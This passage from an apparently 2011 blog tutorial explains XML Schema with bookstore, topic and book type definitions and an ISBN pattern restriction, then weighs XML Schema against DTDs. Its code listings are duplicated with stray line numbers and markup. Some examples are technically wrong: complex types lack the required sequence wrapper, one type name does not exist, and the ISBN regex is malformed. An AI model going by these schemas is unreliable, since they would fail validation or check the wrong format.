    5.     <xsd:element name="topic" type="topicType" minOccurs="1"/>  <br>  
    6.   </xsd:sequence>  <br>  
    7. </xsd:complexType>  
    <xsd:element name="bookstore" type="bookstoreType"/>  
    
    <xsd:complexType name="bookstoreType">  
    
      <xsd:sequence>  
    
        <xsd:element name="name" type="xsd:string"/>  
    
        <xsd:element name="topic" type="topicType" minOccurs="1"/>  
    
      </xsd:sequence>  
    
    </xsd:complexType>
    In this example, we’ve defined an element, bookstore, that will equate to an XML element in our document. We’ve defined it of type bookstoreType, which is not a standard type, and so we provide a definition of that type next.

    We then define a complexType, which defines bookstoreType as a sequence of name and topic elements. Our "name" type is an xsd:string, a type defined by the XML Schema Namespace, and so we’ve fully defined that element.

    The topic element, however, is of type topicType, another custom type that we must define. We’ve also defined our topic element with minOccurs="1", which means there must be at least one element at all times. As maxOccurs is not defined, there no upper limit to the number of elements that might be included. If we had specified neither, the default would be exactly one instance, as is used in the name element. Next, we define the schema for the topicType.
    1. <xsd:complexType name="topicType">  <br>  
    2.   <xsd:element name="name" type="xsd:string"/>  <br>  
    3.   <xsd:element name="book" type="bookType" minOccurs="0"/>  <br>  
    4. </xsd:complexType>  
    <xsd:complexType name="topicType">  
    
      <xsd:element name="name" type="xsd:string"/>  
    
      <xsd:element name="book" type="bookType" minOccurs="0"/>  
    
    </xsd:complexType>
    This is all similar to the declaration of the bookstoreType, but note that we have to re-define our name element within the scope of this type. If we’d used a complex type for name, such as nameType, which defined only an xsd:string — and defined it outside our types, we could re-use it in both. However, to illustrate the point, I decided to define it within each section. XML gets interesting when we get to defining our bookType:
    1. <xsd:complexType name="bookType">  <br>  
    2.   <xsd:element name="title" type="xsd:string"/>  <br>  
    3.   <xsd:element name="author" type="xsd:string"/>  <br>  
    4.   <xsd:attribute name="isbn" type="isbnType"/>  <br>  
    5. </xsd:complexType>  <br>  
    6. <xsd:simpleType name="isbnType">  <br>  
    7.   <xsd:restriction base="xsd:string">  <br>  
    8.     <xsd:pattern value="\[0-9]{3}[-][0-9]{3}[-][0-9]{3}"/>  <br>  
    9.   </xsd:restriction>  <br>  
    10. </xsd:simpleType>  
    <xsd:complexType name="bookType">  
    
      <xsd:element name="title" type="xsd:string"/>  
    
      <xsd:element name="author" type="xsd:string"/>  
    
      <xsd:attribute name="isbn" type="isbnType"/>  
    
    </xsd:complexType>  
    
    <xsd:simpleType name="isbnType">  
    
      <xsd:restriction base="xsd:string">  
    
        <xsd:pattern value="\[0-9]{3}[-][0-9]{3}[-][0-9]{3}"/>  
    
      </xsd:restriction>  
    
    </xsd:simpleType>
    So the definition of the bookType is not particularly interesting. But the definition of its attribute "isbn" is. Not only does XML Schema support the use of types such as xsd:nonNegativeNumber, but we can also create our own simple types from these basic types using various modifiers. In the example for isbnType above, we base it on a string, and restrict it to match a given regular expression. Excusing my poor regex, that should limit any isbn attribute to match the standard of three groups of three digits separated by a dash.
    This is just a simple example, but it should give you a taste of the many things you can do to control the content of an attribute or an element. You have far more control over what is considered a valid XML document using a schema. You can even
    • extend your types from other types you’ve created,
    • require uniqueness within scope, and
    • provide lookups.
    It’s a nicely object oriented approach. You could build a library of complexTypes and simpleTypes for re-use throughout many projects, and even find other definitions of common types (such as an "address", for example) from the Internet and use these to provide powerful definitions of your XML documents.
    DTD vs XML Schema
    The DTD provides a basic grammar for defining an XML Document in terms of the metadata that comprise the shape of the document. An XML Schema provides this, plus a detailed way to define what the data can and cannot contain. It provides far more control for the developer over what is legal, and it provides an Object Oriented approach, with all the benefits this entails.

    So, if XML Schemas provide an Object Oriented approach to defining an XML document’s structure, and if XML Schemas give us the power to define re-useable types such as an ISBN number based on a wide range of pre-defined types, why would we use a DTD? There are in fact several good reasons for using the DTD instead of the schema.
    Firstly, and rather an important point, is that XML Schema is a new technology. This means that whilst some XML Parsers support it fully, many still don’t. If you use XML to communicate with a legacy system, perhaps it won’t support the XML Schema.
    Many systems interfaces are already defined as a DTD. They are mature definitions, rich and complex. The effort in re-writing the definition may not be worthwhile.
    DTD is also established, and examples of common objects defined in a DTD abound on the Internet — freely available for re-use. A developer may be able to use these to define a DTD more quickly than they would be able to accomplish a complete re-development of the core elements as a new schema.
    Finally, you must also consider the fact that the XML Schema is an XML document. It has an XML Namespace to refer to, and an XML DTD to define it. This is all overhead. When a parser examines the document, it may have to link this all in, interperate the DTD for the Schema, load the namespace, and validate the schema, etc., all before it can parse the actual XML document in question. If you’re using XML as a protocol between two systems that are in heavy use, and need a quick response, then this overhead may seriously degrade performance.

    Then again, if your system is available for third party developers as a Web service, then the detailed enforcement of the XML Schema may protect your application a lot more effectively from malicious — or just plain bad — XML packets. As an example, Muse.net is an interesting technology. They have a publicly-available SOAP API defined with an XML Schema that provides their developers more control over what they receive from the user community.

    Saturday, August 13, 2011